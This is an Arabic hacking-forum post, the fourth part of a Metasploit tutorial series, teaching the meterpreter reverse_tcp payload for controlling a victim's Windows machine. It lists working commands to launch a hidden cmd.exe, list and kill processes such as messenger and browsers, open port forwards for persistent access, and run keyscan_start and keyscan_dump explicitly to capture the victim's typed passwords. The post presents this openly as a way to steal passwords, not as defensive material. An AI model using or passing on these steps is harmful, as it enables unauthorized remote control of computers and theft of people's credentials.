اسعد الله اوقات الجميع بكل خير ومحبة ..
وعسى ان يكون الكل بافضل حاله واحسن صحة..
في البداية نشكر كل الاعضاء لما يبذلونه من جهد لرقي المنتدى وازدهاره.
اليوم انشاء الله سأقدم لكم الجزء الرابع من العملاق الميتاسبلويت
هذا الجزء مخصص لبايلود روعة و هو بايلود سحب الباسوردات لووول meterpreter
إن من ما يقدمه هذا البايلود , هو خصائص كثيرة وكتير حلوة .. فإنها تغنيك عن الإتصال العكسي لأن وأنت
بداخلها تقدر تتحكم بالدوس وأي أمر تاني .
وهو يمكنك من أن تشبك مع أي بروسيس .. وتشغيله,,وتخليك تشوف البروسيس المشغل و تتحكم فيه
لتشغيل البايلود في الميتا عليك تطبيق الامر التالي :
set payload windows/meterpreter/reverse_tcp
افضل استعمال الاتصال العكسي على المباشر
كل ما علينا لمعرفة كافة مهام هذا البايلود
علينا تنفيد الامر help
للتحميل download للتحرك في الملفات cd لعرض الملفات ls وهناك الكثير الكثير
الامر الاروع execute يمكننا من تشغيل اي بروسيس و التفاعل معه
احسن شيء تشغيل موجه الاوامر cmd prompt
نشغله بالامر التالي :
execute -H -c -f cmd.exe
-H عرض موجه الاوامر مخفي
وبعد ما نكون نفذنا الأمر فإنه يحصل على رقم قناة خاصة به channel وللدخول والتفاعل معها نكتب
interact 10
نقدر نشوف البروسيسات المشغلة في جهاز الضحية بتطبيق الامر التالي ps
كما نعرف انا لكل بروسيس اي دي خاص به و هدا يمكننا من قتل اي بروسيس وهدا ينفعنا كثيرا
لقتل البروسيس علينا تطبيق الامر Kill PID
PID هو proceseur identifier
ليس هذا فقط بل وأيضا هناك أوامر أخرى كثير من تعديل لللأيبيهات وفتح بورت خاص portfwd لكي تتصل
متى شئت وتنفد هجوماتك .
لسرقة باسوود وهذا الجزء اعرفه انه المهم صح
نفحص البروسيسات متلا msnmessenger.exe
نشوف رقم البروسيس و نقتله kill 1264
و كذلك الشأن بالنسبه للاكسبلورر و الفيرفوكس ادا بدك باسورداتها
بعد دلك نطبق امر فحص الباسورردات
keyscan_start
وهو يعمل سنيف لاي باسورد يكتب يسجل اي شيء هههه
keyscan_dump
هذا الامر لعرض الباسوردات المسحوبة
الان متال لتطبيق هذه الثغرة
set payload windows/meterpreter/reverse_tcp
ps
kill 12658(pid)
keyscan_start
keyscan_dump
انتهى الشرح ارجوا ان ينال اعجابكم
نتلقي في الجزء الخامس انشاء الله
جميع الحقوق محفوظة لمنتديات الجيوش
في امان الله